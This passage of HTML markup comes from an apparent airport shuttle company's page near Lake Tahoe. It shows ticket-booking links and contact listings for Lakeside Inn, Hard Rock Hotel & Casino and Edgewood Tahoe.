height-full"> <div id="padding-2" class="mk-padding-divider clearfix"></div> </div> <div style="" class="vc_col-sm-3 wpb_column column_container _ height-full"> <div id="padding-3" class="mk-padding-divider clearfix"></div> </div> <div style="" class="vc_col-sm-6 wpb_column column_container _ height-full"> <div id="text-block-4" class="mk-text-block "> <h2 style="text-align: center;">On-site Ticketing Desk</h2> <p style="text-align: center;"><span class="s1">Our new on-site location in the airport is located behind National Rental Car.</span></p> <div class="clearboth"></div> </div> <div id="box-icon-5" style="margin-bottom:30px;" class=" simple_ultimate-style mk-box-icon clearfix"><div class="top-side rounded-circle"><a href="https://southtahoeairporter.betterez.com/cart/56e95e5e9553c0410b00070b"><i style="color:#315e37;border-color:#315e37;" class=" medium mk-main-ico"><svg class="mk-svg-icon" data-name="mk-moon-tag-5" data-cacheid="icon-5cdd849f7109f" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><path d="M448 416h-149.49l-208-208 149.49-149.49 208 208v149.49zm64 64v-240l-272-272-240 240 272 272h240zm-192-144a48 48 2700 1 0 96 0 48 48 2700 1 0-96 0z" transform="scale(1 -1) translate(0 -480)"/></svg></i></a><div class="box-detail-wrapper medium-size"><h4 style="font-size:24px;font-weight:bold;"><a href="https://southtahoeairporter.betterez.com/cart/56e95e5e9553c0410b00070b">PURCHASE TICKETS NOW</a></h4><div class="clearboth"></div><a class="icon-box-readmore" href="https://southtahoeairporter.betterez.com/cart/56e95e5e9553c0410b00070b">Book Now <svg class="mk-svg-icon" data-name="mk-icon-caret-right" data-cacheid="icon-5cdd849f7154f" style=" height:16px; width: 5.71428571429px; " xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 1792"><path d="M576 896q0 26-19 45l-448 448q-19 19-45 19t-45-19-19-45v-896q0-26 19-45t45-19 45 19l448 448q19 19 19 45z"/></svg></a></div><div class="clearboth"></div></div><div class="clearboth"></div></div> <div id="padding-6" class="mk-padding-divider clearfix"></div> <div id="box-icon-7" style="margin-bottom:30px;" class=" simple_ultimate-style mk-box-icon clearfix"><div class="top-side "><a href="https://southtahoeairporter.betterez.com/cart/56e95e5e9553c0410b00070b/change/56e95e5f9553c0410b00070d70b"><i style="color:#315e37;" class=" small mk-main-ico"><svg class="mk-svg-icon" data-name="mk-moon-cart-add" data-cacheid="icon-5cdd849f71e40" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><path d="M488.791 382.769c16.993-4.855 26.833-22.567 21.978-39.56l-64-224c-3.925-13.737-16.482-23.209-30.769-23.209h-272c-16.138 0-29.751 12.018-31.753 28.031l-28.496 227.969h-51.751c-17.673 0-32 14.327-32 32 0 17.673 14.327 32 32 32h80c16.138 0 29.751-12.017 31.753-28.031l28.496-227.969h219.613l57.369 200.791c4.855 16.993 22.568 26.832 39.56 21.978zm-360.791-366.769a48 48 2700 1 0 96 0 48 48 2700 1 0-96 0zm192 0a48 48 2700 1 0 96 0 48 48 2700 1 0-96 0zm-138 304h74v96h64v-96h74l-106-114z" transform="scale(1 -1) translate(0 -480)"/></svg></i></a><div class="box-detail-wrapper small-size"><h4 style="font-size:14px;font-weight:400;"><a href="https://southtahoeairporter.betterez.com/cart/56e95e5e9553c0410b00070b/change/56e95e5f9553c0410b00070d70b">CLICK HERE TO CHANGE YOUR RESERVATION</a></h4><div class="clearboth"></div><a class="icon-box-readmore" href="https://southtahoeairporter.betterez.com/cart/56e95e5e9553c0410b00070b/change/56e95e5f9553c0410b00070d70b">Change My Booking <svg class="mk-svg-icon" data-name="mk-icon-caret-right" data-cacheid="icon-5cdd849f71ff0" style=" height:16px; width: 5.71428571429px; " xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 1792"><path d="M576 896q0 26-19 45l-448 448q-19 19-45 19t-45-19-19-45v-896q0-26 19-45t45-19 45 19l448 448q19 19 19 45z"/></svg></a></div><div class="clearboth"></div></div><div class="clearboth"></div></div></div> <div style="" class="vc_col-sm-3 wpb_column column_container _ height-full"> <div id="padding-8" class="mk-padding-divider clearfix"></div> </div> </div> <div class="mk-main-wrapper-holder"> <div class="theme-page-wrapper full-layout mk-grid vc_row-fluid no-padding"> <div class="theme-content no-padding"> <div class="clearboth"></div> </div> </div> </div> <div class="mk-page-section-wrapper"> <div id="page-section-9" class="mk-page-section self-hosted full-width-9 js-el js-master-row " data-intro-effect="false"> <div class="mk-page-section-inner"> <div class="mk-video-mask"></div> <div style="background-color:#d8d8d8;opacity:0.4;" class="mk-video-color-mask"></div> </div> <div class="page-section-content vc_row-fluid mk-grid"> <div class="mk-padding-wrapper"> <div style="" class="vc_col-sm-12 wpb_column column_container _ height-full"> <div id="padding-10" class="mk-padding-divider clearfix"></div> <h2 id="fancy-title-11" class="mk-fancy-title simple-style color-single"> <span> <p>TRAVELING TO TAHOE AND BACK DAILY</p> </span> </h2> <div class="clearboth"></div> <h2 id="fancy-title-12" class="mk-fancy-title simple-style color-single"> <span> <p><span style="color: #315e37;">LET US GET YOU THERE IN COMFORT.</span></p> </span> </h2> <div class="clearboth"></div> <div id="padding-13" class="mk-padding-divider clearfix"></div> <div id="padding-14" class="mk-padding-divider clearfix"></div> </div> </div> <div class="clearboth"></div> </div> <div class="clearboth"></div> </div> </div> <div class="mk-main-wrapper-holder"> <div class="theme-page-wrapper full-layout mk-grid vc_row-fluid"> <div class="theme-content "> <div class="clearboth"></div> </div> </div> </div> <div class="mk-page-section-wrapper"> <div id="page-section-15" class="mk-page-section self-hosted full-width-15 js-el js-master-row " data-intro-effect="false"> <div class="mk-page-section-inner"> <div class="mk-video-color-mask"></div> </div> <div class="page-section-content vc_row-fluid mk-grid"> <div class="mk-padding-wrapper"> <div style="" class="vc_col-sm-12 wpb_column column_container _ height-full"> <div id="padding-16" class="mk-padding-divider clearfix"></div> <div class="wpb_row vc_inner vc_row attched-false vc_row-fluid "> <div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="mk-image align-left simple-frame inside-image " style="margin-bottom:10px"><div class="mk-image-holder" style="max-width: 1280px;"><div class="mk-image-inner "><img class="lightbox-false" alt="" title="" width="1280" height="720" src="http://162.144.216.172/~southtahoeairpor/wp-content/uploads/2016/06/lakeside.jpg" /></div></div><div class="clearboth"></div></div></div></div></div> </div> <div class="wpb_row vc_inner vc_row attched-false vc_row-fluid "> <div class="wpb_column vc_column_container vc_col-sm-8"><div class="vc_column-inner "><div class="wpb_wrapper"> <div id="padding-17" class="mk-padding-divider clearfix"></div> <h3 id="mk-title-box-18" class="mk-title-box clearfix "> <span> <p>Lakeside Inn and Casino</p> </span> </h3> <div class="widget_contact_info mk-contactinfo-shortcode a_margin-bottom-20" itemscope="itemscope" itemtype="https://schema.org/Person" > <ul> <li><i><svg class="mk-svg-icon" data-name="mk-icon-home" data-cacheid="icon-5cdd849f76e14" style=" height:16px; width: 14.8571428571px; " xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1664 1792"><path d="M1408 992v480q0 26-19 45t-45 19h-384v-384h-256v384h-384q-26 0-45-19t-19-45v-480q0-1 .5-3t.5-3l575-474 575 474q1 2 1 6zm223-69l-62 74q-8 9-21 11h-3q-13 0-21-7l-692-577-692 577q-12 8-24 7-13-2-21-11l-62-74q-8-10-7-23.5t11-21.5l719-599q32-26 76-26t76 26l244 204v-195q0-14 9-23t23-9h192q14 0 23 9t9 23v408l219 182q10 8 11 21.5t-7 23.5z"/></svg></i><span itemprop="address" itemscope="" itemtype="http://schema.org/PostalAddress">168 US-50, Stateline, NV 89449</span></li> <li><i><svg class="mk-svg-icon" data-name="mk-icon-phone" data-cacheid="icon-5cdd849f77232" style=" height:16px; width: 12.5714285714px; " xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1408 1792"><path d="M1408 1240q0 27-10 70.5t-21 68.5q-21 50-122 106-94 51-186 51-27 0-52.5-3.5t-57.5-12.5-47.5-14.5-55.5-20.5-49-18q-98-35-175-83-128-79-264.5-215.5t-215.5-264.5q-48-77-83-175-3-9-18-49t-20.5-55.5-14.5-47.5-12.5-57.5-3.5-52.5q0-92 51-186 56-101 106-122 25-11 68.5-21t70.5-10q14 0 21 3 18 6 53 76 11 19 30 54t35 63.5 31 53.5q3 4 17.5 25t21.5 35.5 7 28.5q0 20-28.5 50t-62 55-62 53-28.5 46q0 9 5 22.5t8.5 20.5 14 24 11.5 19q76 137 174 235t235 174q2 1 19 11.5t24 14 20.5 8.5 22.5 5q18 0 46-28.5t53-62 55-62 50-28.5q14 0 28.5 7t35.5 21.5 25 17.5q25 15 53.5 31t63.5 35 54 30q70 35 76 53 3 7 3 21z"/></svg></i><span>(775) 588-7777</span></li> <li><i><svg class="mk-svg-icon" data-name="mk-icon-globe" data-cacheid="icon-5cdd849f7762d" style=" height:16px; width: 13.7142857143px; " xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1536 1792"><path d="M768 128q209 0 385.5 103t279.5 279.5 103 385.5-103 385.5-279.5 279.5-385.5 103-385.5-103-279.5-279.5-103-385.5 103-385.5 279.5-279.5 385.5-103zm274 521q-2 1-9.5 9.5t-13.5 9.5q2 0 4.5-5t5-11 3.5-7q6-7 22-15 14-6 52-12 34-8 51 11-2-2 9.5-13t14.5-12q3-2 15-4.5t15-7.5l2-22q-12 1-17.5-7t-6.5-21q0 2-6 8 0-7-4.5-8t-11.5 1-9 1q-10-3-15-7.5t-8-16.5-4-15q-2-5-9.5-10.5t-9.5-10.5q-1-2-2.5-5.5t-3-6.5-4-5.5-5.5-2.5-7 5-7.5 10-4.5 5q-3-2-6-1.5t-4.5 1-4.5 3-5 3.5q-3 2-8.5 3t-8.5 2q15-5-1-11-10-4-16-3 9-4 7.5-12t-8.5-14h5q-1-4-8.5-8.5t-17.5-8.5-13-6q-8-5-34-9.5t-33-.5q-5 6-4.5 10.5t4 14 3.5 12.5q1 6-5.5 13t-6.5 12q0 7 14 15.5t10 21.5q-3 8-16 16t-16 12q-5 8-1.5 18.5t10.5 16.5q2 2 1.5 4t-3.5 4.5-5.5 4-6.5 3.5l-3 2q-11 5-20.5-6t-13.5-26q-7-25-16-30-23-8-29 1-5-13-41-26-25-9-58-4 6-1 0-15-7-15-19-12 3-6 4-17.5t1-13.5q3-13 12-23 1-1 7-8.5t9.5-13.5.5-6q35 4 50-11 5-5 11.5-17t10.5-17q9-6 14-5.5t14.5 5.5 14.5 5q14 1 15.5-11t-7.5-20q12 1 3-17-5-7-8-9-12-4-27 5-8 4 2 8-1-1-9.5 10.5t-16.5 17.5-16-5q-1-1-5.5-13.5t-9.5-13.5q-8 0-16 15 3-8-11-15t-24-8q19-12-8-27-7-4-20.5-5t-19.5 4q-5 7-5.5 11.5t5 8 10.5 5.5 11.5 4 8.5 3q14 10 8 14-2 1-8.5 3.5t-11.5 4.5-6 4q-3 4 0 14t-2 14q-5-5-9-17.5t-7-16.5q7 9-25 6l-10-1q-4 0-16 2t-20.5 1-13.5-8q-4-8 0-20 1-4 4-2-4-3-11-9.5t-10-8.5q-46 15-94 41 6 1 12-1 5-2 13-6.5t10-5.5q34-14 42-7l5-5q14 16 20 25-7-4-30-1-20 6-22 12 7 12 5 18-4-3-11.5-10t-14.5-11-15-5q-16 0-22 1-146 80-235 222 7 7 12 8 4 1 5 9t2.5 11 11.5-3q9 8 3 19 1-1 44 27 19 17 21 21 3 11-10 18-1-2-9-9t-9-4q-3 5 .5 18.5t10.5 12.5q-7 0-9.5 16t-2.5 35.5-1 23.5l2 1q-3 12 5.5 34.5t21.5 19.5q-13 3 20 43 6 8 8 9 3 2 12 7.5t15 10 10 10.5q4 5 10 22.5t14 23.5q-2 6 9.5 20t10.5 23q-1 0-2.5 1t-2.5 1q3 7 15.5 14t15.5 13q1 3 2 10t3 11 8 2q2-20-24-62-15-25-17-29-3-5-5.5-15.5t-4.5-14.5q2 0 6 1.5t8.5 3.5 7.5 4 2 3q-3 7 2 17.5t12 18.5 17 19 12 13q6 6 14 19.5t0 13.5q9 0 20 10t17 20q5 8 8 26t5 24q2 7 8.5 13.5t12.5 9.5l16 8 13 7q5 2 18.5 10.5t21.5 11.5q10 4 16 4t14.5-2.5 13.5-3.5q15-2 29 15t21 21q36 19 55 11-2 1 .5 7.5t8 15.5 9 14.5 5.5 8.5q5 6 18 15t18 15q6-4 7-9-3 8 7 20t18 10q14-3 14-32-31 15-49-18 0-1-2.5-5.5t-4-8.5-2.5-8.5 0-7.5 5-3q9 0 10-3.5t-2-12.5-4-13q-1-8-11-20t-12-15q-5 9-16 8t-16-9q0 1-1.5 5.5t-1.5 6.5q-13 0-15-1 1-3 2.5-17.5t3.5-22.5q1-4 5.5-12t7.5-14.5 4-12.5-4.5-9.5-17.5-2.5q-19 1-26 20-1 3-3 10.5t-5 11.5-9 7q-7 3-24 2t-24-5q-13-8-22.5-29t-9.5-37q0-10 2.5-26.5t3-25-5.5-24.5q3-2 9-9.5t10-10.5q2-1 4.5-1.5t4.5 0 4-1.5 3-6q-1-1-4-3-3-3-4-3 7 3 28.5-1.5t27.5 1.5q15 11 22-2 0-1-2.5-9.5t-.5-13.5q5 27 29 9 3 3 15.5 5t17.5 5q3 2 7 5.5t5.5 4.5 5-.5 8.5-6.5q10 14 12 24 11 40 19 44 7 3 11 2t4.5-9.5 0-14-1.5-12.5l-1-8v-18l-1-8q-15-3-18.5-12t1.5-18.5 15-18.5q1-1 8-3.5t15.5-6.5 12.5-8q21-19 15-35 7 0 11-9-1 0-5-3t-7.5-5-4.5-2q9-5 2-16 5-3 7.5-11t7.5-10q9 12 21 2 7-8 1-16 5-7 20.5-10.5t18.5-9.5q7 2 8-2t1-12 3-12q4-5 15-9t13-5l17-11q3-4 0-4 18 2 31-11 10-11-6-20 3-6-3-9.5t-15-5.5q3-1 11.5-.5t10.5-1.5q15-10-7-16-17-5-43 12zm-163 877q206-36 351-189-3-3-12.5-4.5t-12.5-3.5q-18-7-24-8 1-7-2.5-13t-8-9-12.5-8-11-7q-2-2-7-6t-7-5.5-7.5-4.5-8.5-2-10 1l-3 1q-3 1-5.5 2.5t-5.5 3-4 3 0 2.5q-21-17-36-22-5-1-11-5.5t-10.5-7-10-1.5-11.5 7q-5 5-6 15t-2 13q-7-5 0-17.5t2-18.5q-3-6-10.5-4.5t-12 4.5-11.5 8.5-9 6.5-8.5 5.5-8.5 7.5q-3 4-6 12t-5 11q-2-4-11.5-6.5t-9.5-5.5q2 10 4 35t5 38q7 31-12 48-27 25-29 40-4 22 12 26 0 7-8 20.5t-7 21.5q0 6 2 16z"/></svg></i><span><a href="http://www.lakesideinn.com/" itemprop="url">http://www.lakesideinn.com/</a></span></li> </ul> </div> </div></div></div><div class="wpb_column vc_column_container vc_col-sm-4"><div class="vc_column-inner "><div class="wpb_wrapper"> <div id="padding-19" class="mk-padding-divider clearfix"></div> <div id="box-icon-20" style="margin-bottom:30px;" class=" simple_ultimate-style mk-box-icon clearfix"><div class="top-side rounded-circle"><a href="https://southtahoeairporter.betterez.com/cart/56e95e5e9553c0410b00070b"><i style="color:#315e37;border-color:#315e37;" class=" medium mk-main-ico"><svg class="mk-svg-icon" data-name="mk-moon-tag-5" data-cacheid="icon-5cdd849f77f62" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><path d="M448 416h-149.49l-208-208 149.49-149.49 208 208v149.49zm64 64v-240l-272-272-240 240 272 272h240zm-192-144a48 48 2700 1 0 96 0 48 48 2700 1 0-96 0z" transform="scale(1 -1) translate(0 -480)"/></svg></i></a><div class="box-detail-wrapper medium-size"><h4 style="font-size:18px;font-weight:bold;"><a href="https://southtahoeairporter.betterez.com/cart/56e95e5e9553c0410b00070b">Buy A Ticket Now</a></h4></div><div class="clearboth"></div></div><div class="clearboth"></div></div></div></div></div> </div></div> </div> <div class="clearboth"></div> </div> <div class="clearboth"></div> </div> </div> <div class="mk-main-wrapper-holder"> <div class="theme-page-wrapper full-layout mk-grid vc_row-fluid"> <div class="theme-content "> <div class="clearboth"></div> </div> </div> </div> <div class="mk-page-section-wrapper"> <div id="page-section-21" class="mk-page-section self-hosted full-width-21 js-el js-master-row " data-intro-effect="false"> <div class="mk-page-section-inner"> <div class="mk-video-color-mask"></div> </div> <div class="page-section-content vc_row-fluid mk-grid"> <div class="mk-padding-wrapper"> <div style="" class="vc_col-sm-12 wpb_column column_container _ height-full"> <div class="wpb_row vc_inner vc_row attched-false vc_row-fluid "> <div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="mk-image align-left simple-frame inside-image " style="margin-bottom:10px"><div class="mk-image-holder" style="max-width: 1280px;"><div class="mk-image-inner "><img class="lightbox-false" alt="" title="" width="1280" height="720" src="http://162.144.216.172/~southtahoeairpor/wp-content/uploads/2016/06/Hardrock.jpg" /></div></div><div class="clearboth"></div></div></div></div></div> </div> <div class="wpb_row vc_inner vc_row attched-false vc_row-fluid "> <div class="wpb_column vc_column_container vc_col-sm-8"><div class="vc_column-inner "><div class="wpb_wrapper"> <div id="padding-22" class="mk-padding-divider clearfix"></div> <h3 id="mk-title-box-23" class="mk-title-box clearfix "> <span> <p>Hard Rock Hotel &amp; Casino</p> </span> </h3> <div class="widget_contact_info mk-contactinfo-shortcode a_margin-bottom-20" itemscope="itemscope" itemtype="https://schema.org/Person" > <ul> <li><i><svg class="mk-svg-icon" data-name="mk-icon-home" data-cacheid="icon-5cdd849f7aa6a" style=" height:16px; width: 14.8571428571px; " xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1664 1792"><path d="M1408 992v480q0 26-19 45t-45 19h-384v-384h-256v384h-384q-26 0-45-19t-19-45v-480q0-1 .5-3t.5-3l575-474 575 474q1 2 1 6zm223-69l-62 74q-8 9-21 11h-3q-13 0-21-7l-692-577-692 577q-12 8-24 7-13-2-21-11l-62-74q-8-10-7-23.5t11-21.5l719-599q32-26 76-26t76 26l244 204v-195q0-14 9-23t23-9h192q14 0 23 9t9 23v408l219 182q10 8 11 21.5t-7 23.5z"/></svg></i><span itemprop="address" itemscope="" itemtype="http://schema.org/PostalAddress">50 US-50, Stateline, NV 89449</span></li> <li><i><svg class="mk-svg-icon" data-name="mk-icon-phone" data-cacheid="icon-5cdd849f7abbb" style=" height:16px; width: 12.5714285714px; " xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1408 1792"><path d="M1408 1240q0 27-10 70.5t-21 68.5q-21 50-122 106-94 51-186 51-27 0-52.5-3.5t-57.5-12.5-47.5-14.5-55.5-20.5-49-18q-98-35-175-83-128-79-264.5-215.5t-215.5-264.5q-48-77-83-175-3-9-18-49t-20.5-55.5-14.5-47.5-12.5-57.5-3.5-52.5q0-92 51-186 56-101 106-122 25-11 68.5-21t70.5-10q14 0 21 3 18 6 53 76 11 19 30 54t35 63.5 31 53.5q3 4 17.5 25t21.5 35.5 7 28.5q0 20-28.5 50t-62 55-62 53-28.5 46q0 9 5 22.5t8.5 20.5 14 24 11.5 19q76 137 174 235t235 174q2 1 19 11.5t24 14 20.5 8.5 22.5 5q18 0 46-28.5t53-62 55-62 50-28.5q14 0 28.5 7t35.5 21.5 25 17.5q25 15 53.5 31t63.5 35 54 30q70 35 76 53 3 7 3 21z"/></svg></i><span>(844) 588-7625</span></li> <li><i><svg class="mk-svg-icon" data-name="mk-icon-globe" data-cacheid="icon-5cdd849f7ad23" style=" height:16px; width: 13.7142857143px; " xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1536 1792"><path d="M768 128q209 0 385.5 103t279.5 279.5 103 385.5-103 385.5-279.5 279.5-385.5 103-385.5-103-279.5-279.5-103-385.5 103-385.5 279.5-279.5 385.5-103zm274 521q-2 1-9.5 9.5t-13.5 9.5q2 0 4.5-5t5-11 3.5-7q6-7 22-15 14-6 52-12 34-8 51 11-2-2 9.5-13t14.5-12q3-2 15-4.5t15-7.5l2-22q-12 1-17.5-7t-6.5-21q0 2-6 8 0-7-4.5-8t-11.5 1-9 1q-10-3-15-7.5t-8-16.5-4-15q-2-5-9.5-10.5t-9.5-10.5q-1-2-2.5-5.5t-3-6.5-4-5.5-5.5-2.5-7 5-7.5 10-4.5 5q-3-2-6-1.5t-4.5 1-4.5 3-5 3.5q-3 2-8.5 3t-8.5 2q15-5-1-11-10-4-16-3 9-4 7.5-12t-8.5-14h5q-1-4-8.5-8.5t-17.5-8.5-13-6q-8-5-34-9.5t-33-.5q-5 6-4.5 10.5t4 14 3.5 12.5q1 6-5.5 13t-6.5 12q0 7 14 15.5t10 21.5q-3 8-16 16t-16 12q-5 8-1.5 18.5t10.5 16.5q2 2 1.5 4t-3.5 4.5-5.5 4-6.5 3.5l-3 2q-11 5-20.5-6t-13.5-26q-7-25-16-30-23-8-29 1-5-13-41-26-25-9-58-4 6-1 0-15-7-15-19-12 3-6 4-17.5t1-13.5q3-13 12-23 1-1 7-8.5t9.5-13.5.5-6q35 4 50-11 5-5 11.5-17t10.5-17q9-6 14-5.5t14.5 5.5 14.5 5q14 1 15.5-11t-7.5-20q12 1 3-17-5-7-8-9-12-4-27 5-8 4 2 8-1-1-9.5 10.5t-16.5 17.5-16-5q-1-1-5.5-13.5t-9.5-13.5q-8 0-16 15 3-8-11-15t-24-8q19-12-8-27-7-4-20.5-5t-19.5 4q-5 7-5.5 11.5t5 8 10.5 5.5 11.5 4 8.5 3q14 10 8 14-2 1-8.5 3.5t-11.5 4.5-6 4q-3 4 0 14t-2 14q-5-5-9-17.5t-7-16.5q7 9-25 6l-10-1q-4 0-16 2t-20.5 1-13.5-8q-4-8 0-20 1-4 4-2-4-3-11-9.5t-10-8.5q-46 15-94 41 6 1 12-1 5-2 13-6.5t10-5.5q34-14 42-7l5-5q14 16 20 25-7-4-30-1-20 6-22 12 7 12 5 18-4-3-11.5-10t-14.5-11-15-5q-16 0-22 1-146 80-235 222 7 7 12 8 4 1 5 9t2.5 11 11.5-3q9 8 3 19 1-1 44 27 19 17 21 21 3 11-10 18-1-2-9-9t-9-4q-3 5 .5 18.5t10.5 12.5q-7 0-9.5 16t-2.5 35.5-1 23.5l2 1q-3 12 5.5 34.5t21.5 19.5q-13 3 20 43 6 8 8 9 3 2 12 7.5t15 10 10 10.5q4 5 10 22.5t14 23.5q-2 6 9.5 20t10.5 23q-1 0-2.5 1t-2.5 1q3 7 15.5 14t15.5 13q1 3 2 10t3 11 8 2q2-20-24-62-15-25-17-29-3-5-5.5-15.5t-4.5-14.5q2 0 6 1.5t8.5 3.5 7.5 4 2 3q-3 7 2 17.5t12 18.5 17 19 12 13q6 6 14 19.5t0 13.5q9 0 20 10t17 20q5 8 8 26t5 24q2 7 8.5 13.5t12.5 9.5l16 8 13 7q5 2 18.5 10.5t21.5 11.5q10 4 16 4t14.5-2.5 13.5-3.5q15-2 29 15t21 21q36 19 55 11-2 1 .5 7.5t8 15.5 9 14.5 5.5 8.5q5 6 18 15t18 15q6-4 7-9-3 8 7 20t18 10q14-3 14-32-31 15-49-18 0-1-2.5-5.5t-4-8.5-2.5-8.5 0-7.5 5-3q9 0 10-3.5t-2-12.5-4-13q-1-8-11-20t-12-15q-5 9-16 8t-16-9q0 1-1.5 5.5t-1.5 6.5q-13 0-15-1 1-3 2.5-17.5t3.5-22.5q1-4 5.5-12t7.5-14.5 4-12.5-4.5-9.5-17.5-2.5q-19 1-26 20-1 3-3 10.5t-5 11.5-9 7q-7 3-24 2t-24-5q-13-8-22.5-29t-9.5-37q0-10 2.5-26.5t3-25-5.5-24.5q3-2 9-9.5t10-10.5q2-1 4.5-1.5t4.5 0 4-1.5 3-6q-1-1-4-3-3-3-4-3 7 3 28.5-1.5t27.5 1.5q15 11 22-2 0-1-2.5-9.5t-.5-13.5q5 27 29 9 3 3 15.5 5t17.5 5q3 2 7 5.5t5.5 4.5 5-.5 8.5-6.5q10 14 12 24 11 40 19 44 7 3 11 2t4.5-9.5 0-14-1.5-12.5l-1-8v-18l-1-8q-15-3-18.5-12t1.5-18.5 15-18.5q1-1 8-3.5t15.5-6.5 12.5-8q21-19 15-35 7 0 11-9-1 0-5-3t-7.5-5-4.5-2q9-5 2-16 5-3 7.5-11t7.5-10q9 12 21 2 7-8 1-16 5-7 20.5-10.5t18.5-9.5q7 2 8-2t1-12 3-12q4-5 15-9t13-5l17-11q3-4 0-4 18 2 31-11 10-11-6-20 3-6-3-9.5t-15-5.5q3-1 11.5-.5t10.5-1.5q15-10-7-16-17-5-43 12zm-163 877q206-36 351-189-3-3-12.5-4.5t-12.5-3.5q-18-7-24-8 1-7-2.5-13t-8-9-12.5-8-11-7q-2-2-7-6t-7-5.5-7.5-4.5-8.5-2-10 1l-3 1q-3 1-5.5 2.5t-5.5 3-4 3 0 2.5q-21-17-36-22-5-1-11-5.5t-10.5-7-10-1.5-11.5 7q-5 5-6 15t-2 13q-7-5 0-17.5t2-18.5q-3-6-10.5-4.5t-12 4.5-11.5 8.5-9 6.5-8.5 5.5-8.5 7.5q-3 4-6 12t-5 11q-2-4-11.5-6.5t-9.5-5.5q2 10 4 35t5 38q7 31-12 48-27 25-29 40-4 22 12 26 0 7-8 20.5t-7 21.5q0 6 2 16z"/></svg></i><span><a href="http://hardrockcasinolaketahoe.com/" itemprop="url">http://hardrockcasinolaketahoe.com/</a></span></li> </ul> </div> </div></div></div><div class="wpb_column vc_column_container vc_col-sm-4"><div class="vc_column-inner "><div class="wpb_wrapper"> <div id="padding-24" class="mk-padding-divider clearfix"></div> <div id="box-icon-25" style="margin-bottom:30px;" class=" simple_ultimate-style mk-box-icon clearfix"><div class="top-side rounded-circle"><a href="https://southtahoeairporter.betterez.com/cart/56e95e5e9553c0410b00070b"><i style="color:#315e37;border-color:#315e37;" class=" medium mk-main-ico"><svg class="mk-svg-icon" data-name="mk-moon-tag-5" data-cacheid="icon-5cdd849f7b618" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><path d="M448 416h-149.49l-208-208 149.49-149.49 208 208v149.49zm64 64v-240l-272-272-240 240 272 272h240zm-192-144a48 48 2700 1 0 96 0 48 48 2700 1 0-96 0z" transform="scale(1 -1) translate(0 -480)"/></svg></i></a><div class="box-detail-wrapper medium-size"><h4 style="font-size:18px;font-weight:bold;"><a href="https://southtahoeairporter.betterez.com/cart/56e95e5e9553c0410b00070b">Buy A Ticket Now</a></h4></div><div class="clearboth"></div></div><div class="clearboth"></div></div></div></div></div> </div></div> </div> <div class="clearboth"></div> </div> <div class="clearboth"></div> </div> </div> <div class="mk-main-wrapper-holder"> <div class="theme-page-wrapper full-layout mk-grid vc_row-fluid"> <div class="theme-content "> <div class="clearboth"></div> </div> </div> </div> <div class="mk-page-section-wrapper"> <div id="page-section-26" class="mk-page-section self-hosted full-width-26 js-el js-master-row " data-intro-effect="false"> <div class="mk-page-section-inner"> <div class="mk-video-color-mask"></div> </div> <div class="page-section-content vc_row-fluid mk-grid"> <div class="mk-padding-wrapper"> <div style="" class="vc_col-sm-12 wpb_column column_container _ height-full"> <div class="wpb_row vc_inner vc_row attched-false vc_row-fluid "> <div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="mk-image align-left simple-frame inside-image " style="margin-bottom:10px"><div class="mk-image-holder" style="max-width: 1280px;"><div class="mk-image-inner "><img class="lightbox-false" alt="" title="" width="1280" height="720" src="http://southtahoeairporter.com/wp-content/uploads/bfi_thumb/edgewoodtahoe-na2kybgmqrevbeuru7jb265gd6n3kca477id5oavm8.jpg" /></div></div><div class="clearboth"></div></div></div></div></div> </div> <div class="wpb_row vc_inner vc_row attched-false vc_row-fluid "> <div class="wpb_column vc_column_container vc_col-sm-8"><div class="vc_column-inner "><div class="wpb_wrapper"> <div id="padding-27" class="mk-padding-divider clearfix"></div> <h3 id="mk-title-box-28" class="mk-title-box clearfix "> <span>Edgewood Tahoe</span> </h3> <div class="widget_contact_info mk-contactinfo-shortcode a_margin-bottom-20" itemscope="itemscope" itemtype="https://schema.org/Person" > <ul> <li><i><svg class="mk-svg-icon" data-name="mk-icon-home" data-cacheid="icon-5cdd849f7e517" style=" height:16px; width: 14.8571428571px; " xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1664 1792"><path d="M1408 992v480q0 26-19 45t-45 19h-384v-384h-256v384h-384q-26 0-45-19t-19-45v-480q0-1 .5-3t.5-3l575-474 575 474q1 2 1 6zm223-69l-62 74q-8 9-21 11h-3q-13 0-21-7l-692-577-692 577q-12 8-24 7-13-2-21-11l-62-74q-8-10-7-23.5t11-21.5l719-599q32-26 76-26t76 26l244 204v-195q0-14 9-23t23-9h192q14 0 23 9t9 23v408l219 182q10 8 11 21.5t-7 23.5z"/></svg></i><span itemprop="address" itemscope="" itemtype="http://schema.org/PostalAddress">100 Lake Parkway, Lake Tahoe, NV 89449</span></li> <li><i><svg class="mk-svg-icon" data-name="mk-icon-phone" data-cacheid="icon-5cdd849f7e67b" style=" height:16px; width: 12.5714285714px; " xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1408 1792"><path d="M1408 1240q0 27-10 70.5t-21 68.5q-21 50-122 106-94 51-186 51-27 0-52.5-3.5t-57.5-12.5-47.5-14.5-55.5-20.5-49-18q-98-35-175-83-128-79-264.5-215.5t-215.5-264.5q-48-77-83-175-3-9-18-49t-20.5-55.5-14.5-47.5-12.5-57.5-3.5-52.5q0-92 51-186 56-101 106-122 25-11 68.5-21t70.5-10q14 0 21 3 18 6 53 76 11 19 30 54t35 63.5 31 53.5q3 4 17.5 25t21.5 35.5 7 28.5q0 20-28.5 50t-62 55-62 53-28.5 46q0 9 5 22.5t8.5 20.5 14 24 11.5 19q76 137 174 235t235 174q2 1 19 11.5t24 14 20.5 8.5 22.5 5q18 0 46-28.5t53-62 55-62 50-28.5q14 0 28.5 7t35.5 21.5 25 17.5q25 15 53.5 31t63.5 35 54 30q70 35 